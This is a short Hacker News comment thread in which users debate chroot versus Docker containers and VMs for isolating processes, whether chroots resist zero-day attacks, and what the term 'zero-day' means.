Hacker News new | ask | show | jobs
by doomrobo 4111 days ago
Pretty much. There's always the option of putting it in a container (using Docker, for instance) or VM but chroot is probably the most commonly used and has the least overhead.
2 comments
ncza 4111 days ago
Docker is not a security thing!
link
doomrobo 4110 days ago
I hear this refrain a lot but I never really understood it. Could you explain? I would personally feel much more comfortable running a process as a unique user in an fresh Ubuntu container than running it in a chroot. One needn't go far to find a huge number of chroot escape methods.
link
walterbell 4110 days ago
https://news.ycombinator.com/item?id=8107450
link
walterbell 4111 days ago
In this OS, are chroots enough to "withstand zero-day attacks in userspace", e.g. in combination with other hardening features?
link
fleitz 4111 days ago
Yes, the lack of a network stack prevents the most common attacks, and drastically reduces the usefulness of gaining control of the system.
link
unwind 4111 days ago
I had to look up "zero-day attack", but it really meant what I thought it did, i.e. a previously unreported ("fresh") exploit (http://en.wikipedia.org/wiki/Zero-day_attack).

I don't understand this usage, which makes it sound as if zero-day attacks are a technical term, a category of attacks. Can anyone clarify?

link
walterbell 4110 days ago
It's more of a business term, e.g. http://en.wikipedia.org/wiki/Vupen
link